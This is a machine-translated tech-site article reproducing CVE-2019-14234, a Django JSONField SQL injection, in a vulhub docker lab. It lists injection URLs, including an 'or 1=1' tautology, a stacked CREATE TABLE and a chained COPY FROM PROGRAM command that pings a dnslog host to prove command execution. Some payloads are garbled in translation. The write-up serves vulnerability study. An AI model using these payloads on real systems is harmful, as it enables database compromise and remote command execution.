In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-01 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >
Share
Shulou(Shulou.com)06/01 Report--
This article will explain in detail how the reproduction of Django JSONField SQL injection vulnerability CVE-2019-14234 is. The content of the article is of high quality, so the editor shares it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.
Introduction to 0x00
Django is a popular open source web framework written by Python, and many websites and app are based on Django. Django adopts the framework pattern of MTV, namely model M, view V and template T. with Django, programmers can easily and quickly create high-quality, easy-to-maintain, database-driven applications. And Django also contains many powerful third-party plug-ins, which makes Django have strong expansibility.
Overview of 0x01 vulnerabilities
The vulnerability requires that the developer uses JSONField/HStoreField, and the user can control the key name of the queryset query, and inject SQL statements in the location of the key name.
Django is usually paired with a postgresql database, and JSONField is a data type of that database. The reason for this vulnerability lies in the implementation of the JSONField class in Django. The most essential function of Django's model is to generate SQL statements, while when Django generates sql statements through JSONField, it is through simple string concatenation.
Get the KeyTransform class through the JSONField class and generate the location of the sql statement.
Where key_name is a controllable string, and the resulting statement is WHERE (field- >'[key_name]') = 'value', so SQL injection can be done.
0x02 affects version
Django
1.11.x before 1.11.23
2.1.x before 2.1.11
2.2.x before 2.2.4
0x03 environment building
Online environment:
Forward this article to moments and send screenshots to the official account.
Build on your own:
Directly use vulhub's docker environment to build
Git clone https://github.com/vulhub/vulhub.gitcd vulhub/django/CVE-2019-14234/docker-compose up-d
If you can access the http://ip:8000 normally, it means that the construction is successful.
0x04 vulnerability exploitation
Through the analysis of the code, we can know that if you use JSONField in your Django and the "key name" of the query is controllable, you can do SQL injection.
Visit http://ip:8000/admin
Enter the user name admin, password a123123123
Then visit
Http://ip:8000/admin/vuln/collection/
Then construct URL to query
Http://ip:8000/admin/vuln/collection/?detail__a%27b=123
You can see that the injection has been successful, and you can see the constructed SQL statement
To further verify the injection statement, we continue to construct
Http://ip:8000/admin/vuln/collection/?detail__title')='1' or 1mm 1m
The key part of the sql statement generated in the background is
WHERE ("vuln_collection". "detail"-> 'title') =' 1' or 1mi -') =% s
Since or 1 is always true, all results should be returned, and the page returns as expected, as shown in the following figure
In the next step, combined with CVE-2019-9193, we try to inject commands and construct url as follows
Http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1% 3bcreate table cmd_exec (cmd_output text) -% 20
Although the page result reported an error, the reason for the error is no results to fetch, indicating that our statement has been executed
Then use dnslog to detect whether the command can be executed
Http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 3bcopy cmd_exec FROM PROGRAM 'ping c2pn4v.dnslog.cn'--%20
Traffic detected successfully
The postgresql database docker in the reproduction environment does not have external port mapping. If it is open or in the real environment, you can also combine msf to getshell through CVE-2019-9193.
On the Django JSONField SQL injection vulnerability CVE-2019-14234 recurrence is how to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.